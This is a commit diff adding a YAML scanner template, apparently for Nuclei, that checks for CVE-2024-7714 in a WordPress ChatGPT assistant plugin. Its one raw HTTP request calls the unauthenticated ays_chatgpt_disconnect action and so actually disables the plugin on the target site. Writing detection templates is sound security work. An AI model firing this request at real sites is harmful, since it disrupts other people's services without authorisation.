add CVE-2024-7714
parent
566aef5bab
commit
95f61d0ec1
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2024-7714
|
||||
|
||||
info:
|
||||
name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
|
||||
author: s4e-io
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-7714
|
||||
- https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
|
||||
classification:
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2024-7714
|
||||
cwe-id: CWE-284
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: ays-chatgpt-assistant-team
|
||||
product: ays-chatgpt-assistant
|
||||
framework: wordpress
|
||||
publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
|
||||
tags: wpscan,cve,cve2024,
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "true")'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
Loading…
Reference in New Issue